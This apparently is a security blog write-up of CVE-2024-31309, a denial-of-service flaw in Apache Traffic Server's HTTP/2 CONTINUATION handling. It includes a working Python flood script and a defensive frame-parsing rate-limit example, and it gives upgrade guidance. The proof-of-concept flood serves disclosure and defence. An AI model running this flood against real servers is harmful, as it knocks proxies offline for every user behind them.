In this long read, we discuss the recently disclosed vulnerability CVE-2024-31309 in Apache Traffic Server (ATS). It allows an unauthenticated client to cause a Denial of Service (DoS) by sending a stream of HTTP/2 CONTINUATION frames, which drives up resource consumption on the server. The affected versions are ATS 8.0.0 through 8.1.9 and ATS 9.0.0 through 9.2.3.

This post will cover the details of the vulnerability, a code snippet to demonstrate the exploit, the available solutions to address this issue, and links to original references and resources.

Vulnerability Details

The weakness lies in how the affected versions handle HTTP/2 CONTINUATION frames. In HTTP/2, a client opens a header block with a HEADERS frame that does not set END_HEADERS, and the block stays open until a CONTINUATION frame carrying END_HEADERS arrives. A client that never sends that final frame can keep a single connection feeding CONTINUATION frames indefinitely, and each one is accepted and processed by ATS. The result is excessive resource consumption on the server, which can degrade or deny service for every client behind the proxy. The advisory notes that the memory a single request may use was already bounded in earlier releases, so the fix targets the rate of frames rather than the size of what is buffered.

Code Snippet

The following snippet negotiates HTTP/2 over TLS, opens a header block on stream 1 with a HEADERS frame that does not set END_HEADERS, and then sends a large number of CONTINUATION frames that never close the block, demonstrating the attack:

import socket
import ssl

target = ("example.com", 443)  # placeholder host; port 443 means TLS with ALPN "h2"
http2_preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'  # RFC 9113 client connection preface

ctx = ssl.create_default_context()
ctx.set_alpn_protocols(["h2"])
sock = ctx.wrap_socket(socket.create_connection(target), server_hostname=target[0])
sock.sendall(http2_preface)
sock.sendall(b'\x00\x00\x00' + b'\x04' + b'\x00' + b'\x00\x00\x00\x00')  # empty SETTINGS frame that must follow the preface

stream_id = 1
stream_id_field = stream_id.to_bytes(4, 'big')  # 31-bit stream identifier in a 4-byte field
header_block_fragment = b'\x88'  # one-byte HPACK fragment (indexed header field)

# HEADERS frame without END_HEADERS: opens a header block that the server expects CONTINUATION frames to complete
headers_frame = b'\x00\x00\x01' + b'\x01' + b'\x00' + stream_id_field + header_block_fragment
sock.sendall(headers_frame)

continuation_frame = b'\x00\x00\x01'  # Length: 1 byte of payload
continuation_frame += b'\x09'  # CONTINUATION frame type
continuation_frame += b'\x00'  # No flags, so END_HEADERS is never set and the block never closes
continuation_frame += stream_id_field  # Must be the stream that has the open header block

for i in range(10000):
    sock.sendall(continuation_frame + header_block_fragment)

Solution and Fixes

To mitigate the issue, the fixed releases add a new configuration setting, proxy.config.http2.max_continuation_frames_per_minute, which caps the number of CONTINUATION frames a client may send per minute. The advisory also notes that ATS already enforces a fixed limit on the memory a single request can use, and that earlier releases adhered to that limit; the new setting bounds the frame rate as well, so a client can no longer keep the server busy with an endless stream of small frames that never exceed the memory cap.
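To make the two controls in the fix concrete, here is an added example, not code from the ATS project, that walks a raw HTTP/2 frame stream and applies them: CONTINUATION frames are only accepted for a stream whose header block is open, their arrival rate is capped per minute in the spirit of proxy.config.http2.max_continuation_frames_per_minute, and the bytes buffered for one header block are bounded as a stand-in for the fixed per-request memory the advisory mentions. The class and function names, the default thresholds (120 frames per minute, 64 KiB), the synthetic clock, and the constructed traffic are all assumptions of the example; the flood input reproduces the shape of the snippet above.

```python
"""Added example (not ATS code): a minimal HTTP/2 frame walker that applies a
per-minute CONTINUATION budget and a bounded header block to constructed
traffic. All names, thresholds and inputs are assumptions of this example."""
import struct

PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
HEADERS, CONTINUATION = 0x1, 0x9
END_HEADERS = 0x4


def frame(ftype, flags, stream_id, payload):
    """Encode one HTTP/2 frame: 24-bit length, type, flags, 31-bit stream id."""
    header = len(payload).to_bytes(3, "big") + bytes([ftype, flags])
    return header + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload


def iter_frames(data):
    """Yield (type, flags, stream_id, payload) from a raw frame stream."""
    pos = 0
    while pos + 9 <= len(data):
        length = int.from_bytes(data[pos:pos + 3], "big")
        ftype, flags = data[pos + 3], data[pos + 4]
        stream_id = struct.unpack(">I", data[pos + 5:pos + 9])[0] & 0x7FFFFFFF
        payload = data[pos + 9:pos + 9 + length]
        if len(payload) < length:
            break  # truncated frame: wait for more bytes
        yield ftype, flags, stream_id, payload
        pos += 9 + length


class ContinuationGuard:
    """Per-connection state. max_per_minute plays the role of the advisory's
    proxy.config.http2.max_continuation_frames_per_minute (0 disables the check
    in this example); max_header_bytes stands in for the fixed per-request
    header memory the advisory mentions."""

    def __init__(self, max_per_minute=120, max_header_bytes=64 * 1024, window=60.0):
        self.max_per_minute = max_per_minute
        self.max_header_bytes = max_header_bytes
        self.window = window
        self.open_stream = None  # stream whose header block is still open
        self.buffered = 0        # header block bytes buffered for that stream
        self.stamps = []         # arrival times of recent CONTINUATION frames

    def handle(self, ftype, flags, stream_id, payload, now):
        """Return None to keep going, or a string naming why the connection is closed."""
        if ftype == HEADERS:
            if self.open_stream is not None:
                return "PROTOCOL_ERROR: HEADERS while a header block is open"
            self.buffered = len(payload)
            if not flags & END_HEADERS:
                self.open_stream = stream_id
        elif ftype == CONTINUATION:
            if stream_id != self.open_stream:
                return "PROTOCOL_ERROR: CONTINUATION without an open header block"
            # sliding window: keep only arrivals from the last `window` seconds
            self.stamps = [t for t in self.stamps if now - t < self.window] + [now]
            if self.max_per_minute and len(self.stamps) > self.max_per_minute:
                return "ENHANCE_YOUR_CALM: CONTINUATION rate limit exceeded"
            self.buffered += len(payload)
            if flags & END_HEADERS:
                self.open_stream = None
        elif self.open_stream is not None:
            return "PROTOCOL_ERROR: interleaved frame inside a header block"
        if self.buffered > self.max_header_bytes:
            return "ENHANCE_YOUR_CALM: header block too large"
        return None


def scan(data, guard, frames_per_second=1000.0):
    """Walk a stream; a synthetic clock advances per frame so the rate limit is testable."""
    if not data.startswith(PREFACE):
        return "PROTOCOL_ERROR: missing connection preface"
    for i, (ftype, flags, sid, payload) in enumerate(iter_frames(data[len(PREFACE):])):
        verdict = guard.handle(ftype, flags, sid, payload, now=i / frames_per_second)
        if verdict:
            return verdict
    return "OK"


# Constructed traffic: the flood from the snippet above (HEADERS without END_HEADERS,
# then many 1-byte CONTINUATION frames), a well-formed two-frame header block, and a
# CONTINUATION with no preceding HEADERS.
FLOOD = PREFACE + frame(HEADERS, 0, 1, b"\x88") + frame(CONTINUATION, 0, 1, b"\x88") * 10000
BENIGN = PREFACE + frame(HEADERS, 0, 1, b"\x88") + frame(CONTINUATION, END_HEADERS, 1, b"\x88")
ORPHAN = PREFACE + frame(CONTINUATION, 0, 1, b"\x88")

if __name__ == "__main__":
    print(scan(FLOOD, ContinuationGuard()))   # rate limit trips on the 121st CONTINUATION
    print(scan(BENIGN, ContinuationGuard()))  # OK
    print(scan(ORPHAN, ContinuationGuard()))  # PROTOCOL_ERROR
```

Run it directly to see the three verdicts. With the rate check disabled (max_per_minute=0) the same flood is stopped only by the header size bound, which illustrates why a memory cap alone does not stop a stream of tiny frames. On a patched ATS the real control is set in records.config as proxy.config.http2.max_continuation_frames_per_minute and can be read back with traffic_ctl config get proxy.config.http2.max_continuation_frames_per_minute.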

The recommended solution is to upgrade to ATS 8.1.10 or ATS 9.2.4, which have fixes for this issue in place.

For more information on this vulnerability, refer to the following sources:

1. Apache Traffic Server Mailing List Announcement: https://lists.apache.org/thread/7o7v5eq4209f2fzpt3ychr5f56tmlzcw

2. ATS GitHub Issue: https://github.com/apache/trafficserver/issues/7548

3. CVE Information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31309

Conclusion

CVE-2024-31309 is a reminder that proxy and server software needs continuous security updates and monitoring. By upgrading to the fixed releases, or at minimum applying the new CONTINUATION rate limit, administrators can protect their Apache Traffic Server deployments against this class of resource-exhaustion DoS attack.

Timeline

Published on: 04/10/2024 12:15:09 UTC
Last modified on: 04/28/2024 22:15:45 UTC